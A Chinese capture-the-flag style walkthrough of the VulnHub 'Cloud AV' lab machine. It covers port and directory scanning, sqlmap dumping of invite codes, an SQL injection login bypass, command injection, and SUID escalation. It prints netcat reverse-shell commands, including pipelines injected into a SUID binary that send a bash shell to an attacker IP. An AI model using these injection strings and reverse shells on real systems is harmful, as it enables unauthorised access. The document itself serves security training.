No.2: BOREDHACKERBLOG: CLOUD AV

靶機(jī)信息

https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

滲透步驟

主機(jī)服務(wù)掃描

  • arp-scan -l
  • nmap -p- 192.168.0.101
  • nmap -p8080 -sV 192.168.0.101
#8080運(yùn)行web服務(wù)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
MAC Address: 08:00:27:FA:B2:D0 (Oracle VirtualBox virtual NIC)

web滲透

  • 訪問(wèn)http://192.168.0.101:8080/怀愧,掃描發(fā)現(xiàn)三個(gè)目錄翎嫡,兩個(gè)post接口圣勒,一個(gè)get接口
┌──(root??kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.101:8080                                                                         
[05:47:20] Starting: 
[05:47:28] 200 -    2KB - /console                                                                              
[05:47:35] 405 -  178B  - /login                                                                                  
[05:47:36] 405 -  178B  - /output                                                          
                                    
  • 進(jìn)行sql注入瞳腌,發(fā)現(xiàn)輸入雙引號(hào) " 后程序會(huì)報(bào)錯(cuò)


    image.png
  • sqlmap掃描斟薇,有一張password表,有4條記錄
└─# sqlmap -u "http://192.168.1.48:8080/login" --data "password=1" --level 3 --risk 3 -T code -C password --dump
+--------------------+
| password           |
+--------------------+
| myinvitecode123    |
| mysecondinvitecode |
| cloudavtech        |
| mostsecurescanner  |
+--------------------+
  • 使用密碼登錄即可,或使用萬(wàn)能鑰匙 " or 1=1 --


    image.png

命令注入

  • 輸入框中輸入文件名钾虐,即可掃描鞭光,發(fā)現(xiàn)可能存在命令執(zhí)行漏洞吏廉;
  • 命令執(zhí)行 hello1 | ls ,顯示可執(zhí)行命令


    image.png

使用nc反彈shell

通用做法:

  • 在攻擊主機(jī)上執(zhí)行端口監(jiān)聽nc -lvvp port
  • 在目標(biāo)主機(jī)上執(zhí)行:nc -e /bin/bash 攻擊主機(jī)ip port

但是nc版本原因惰许,部分情況下 -e參數(shù)不能使用席覆;

  • 在攻擊主機(jī)上打開兩個(gè)終端,分別監(jiān)聽 1234 和 4321 端口
  • nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321
  • 得到反彈shell后汹买,1234 終端 輸入命令佩伤, 4321 終端就會(huì)獲得執(zhí)行相應(yīng)命令后的結(jié)果

suid提權(quán)

  • 檢查目錄下存在可執(zhí)行文件 update_cloudav,同級(jí)目錄下有.c文件晦毙,考慮為c語(yǔ)言源碼畦戒。


    image.png
  • 同時(shí)檢查update_cloudav.c文件內(nèi)容,存在執(zhí)行命令語(yǔ)句结序。


    image.png
  • 在主機(jī)開啟6666、7777端口纵潦,執(zhí)行命令 ./update_cloudav "a| nc 192.168.0.104 6666 | /bin/bash | nc 192.168.0.104 7777"
image.png

知識(shí)點(diǎn)總結(jié)

  1. nc反彈shell
    https://blog.csdn.net/qiuyeyijian/article/details/102993592#0x02_ncnetcat_33
  2. suid提權(quán) https://blog.csdn.net/shuteer_xu/article/details/104912790
  3. 命令注入 | || & && 的區(qū)別
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末徐鹤,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子邀层,更是在濱河造成了極大的恐慌返敬,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,743評(píng)論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件寥院,死亡現(xiàn)場(chǎng)離奇詭異劲赠,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)秸谢,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,296評(píng)論 3 385
  • 文/潘曉璐 我一進(jìn)店門凛澎,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人估蹄,你說(shuō)我怎么就攤上這事塑煎。” “怎么了臭蚁?”我有些...
    開封第一講書人閱讀 157,285評(píng)論 0 348
  • 文/不壞的土叔 我叫張陵最铁,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我垮兑,道長(zhǎng)冷尉,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,485評(píng)論 1 283
  • 正文 為了忘掉前任系枪,我火速辦了婚禮雀哨,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘嗤无。我一直安慰自己震束,他們只是感情好怜庸,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,581評(píng)論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著垢村,像睡著了一般割疾。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上嘉栓,一...
    開封第一講書人閱讀 49,821評(píng)論 1 290
  • 那天宏榕,我揣著相機(jī)與錄音,去河邊找鬼侵佃。 笑死麻昼,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的馋辈。 我是一名探鬼主播抚芦,決...
    沈念sama閱讀 38,960評(píng)論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼迈螟!你這毒婦竟也來(lái)了叉抡?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,719評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤答毫,失蹤者是張志新(化名)和其女友劉穎褥民,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體洗搂,經(jīng)...
    沈念sama閱讀 44,186評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡消返,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,516評(píng)論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了耘拇。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片撵颊。...
    茶點(diǎn)故事閱讀 38,650評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖驼鞭,靈堂內(nèi)的尸體忽然破棺而出秦驯,到底是詐尸還是另有隱情,我是刑警寧澤挣棕,帶...
    沈念sama閱讀 34,329評(píng)論 4 330
  • 正文 年R本政府宣布译隘,位于F島的核電站,受9級(jí)特大地震影響洛心,放射性物質(zhì)發(fā)生泄漏固耘。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,936評(píng)論 3 313
  • 文/蒙蒙 一词身、第九天 我趴在偏房一處隱蔽的房頂上張望厅目。 院中可真熱鬧,春花似錦、人聲如沸损敷。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,757評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)拗馒。三九已至路星,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間诱桂,已是汗流浹背洋丐。 一陣腳步聲響...
    開封第一講書人閱讀 31,991評(píng)論 1 266
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留挥等,地道東北人友绝。 一個(gè)月前我還...
    沈念sama閱讀 46,370評(píng)論 2 360
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像肝劲,于是被迫代替她去往敵國(guó)和親迁客。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,527評(píng)論 2 349

推薦閱讀更多精彩內(nèi)容

  • 旨在解決滲透測(cè)試中遇到的各種疑難問(wèn)題### 測(cè)試目標(biāo)分類:WEB辞槐,APP哲泊,PC,SERVER等APP:1.利用抓包...
    曾經(jīng)那個(gè)少年_閱讀 2,349評(píng)論 1 0
  • 提權(quán)方法:溢出漏洞提權(quán)催蝗、數(shù)據(jù)庫(kù)提權(quán)(mysql提權(quán)(udf提權(quán),mof提權(quán)育特,自啟動(dòng)提權(quán))丙号、mssql提權(quán))、第三方...
    皮蛋是個(gè)臭蛋閱讀 2,007評(píng)論 0 2
  • docker快速入門01docker快速入門02KVM和Docker的對(duì)比 docker常用命令 什么是容器缰冤? 容...
    酷酷的偉閱讀 863評(píng)論 0 5
  • 硬件相關(guān)知識(shí) 馮諾依曼模型1945年棉浸,馮諾依曼和其他計(jì)算機(jī)科學(xué)家提出了計(jì)算機(jī)具體實(shí)現(xiàn)的報(bào)告怀薛,遵循了圖靈機(jī)的設(shè)計(jì),提...
    今年五年級(jí)閱讀 314評(píng)論 0 1
  • HTTP : Web 的基礎(chǔ) 第一章 HTTP概述 Web客戶端和服務(wù)器 客戶端請(qǐng)求服務(wù)器內(nèi)容 資源 媒體類型 M...
    93張先生閱讀 754評(píng)論 0 1